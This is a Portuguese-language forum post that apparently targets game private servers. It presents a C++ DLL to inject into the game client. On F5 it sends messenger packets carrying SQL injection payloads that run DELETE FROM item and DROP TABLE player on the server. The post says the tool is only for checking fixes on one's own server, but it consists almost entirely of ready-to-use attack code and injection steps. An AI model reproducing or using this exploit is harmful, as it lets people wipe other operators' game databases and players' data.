Jump to content

[Exploit] Injeção Sql


tierrilopes
 Share

Recommended Posts

Como já passou algum tempo, todos os servidores já devem ter isto corrigido.

 

1-Criar um projecto para dll.

2-Incorporar a pasta extern/include/python do vosso cliente.

3-Injectar a dll e carregar F5 dentro do jogo.

 

O propósito é verificar se as correções efectuadas no VOSSO servidor estão a funcionar. Não utilizem noutros servidores.

 

 

 

 

#include <windows.h>

#include <WindowsX.h>

#include <python.h>

#include "stdafx.h"

#include <windows.h>

#include <assert.h>

#include <tlhelp32.h>

#include <aclapi.h>

#include <psapi.h>

#include <imagehlp.h>

#include <iostream>

#include <string>

#include <vector>

#include <time.h>

 

void Delete_db()

{

PyRun_SimpleString("import net");

PyRun_SimpleString("net.SendMessengerRemovePacket(\"';DELETE FROM item; --\", \"ss\")");

PyRun_SimpleString("net.SendMessengerRemovePacket(\"';DROP TABLE player; --\", \"ss\")");

MessageBoxA(NULL, "Command sent!", "Sent", NULL);

}

 

void sql_inject()

{

I:

if (GetAsyncKeyState(VK_F5)) Delete_db();

goto I;

}

 

BOOL APIENTRY DLLSQL_INJECT(HMODULE mod, DWORD reason, LPVOID re)

{

if (reason == DLL_PROCESS_ATTACH) CreateThread(NULL, NULL, LPTHREAD_START_ROUTINE(sql_inject), NULL, NULL, NULL);

return TRUE;

}

 

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...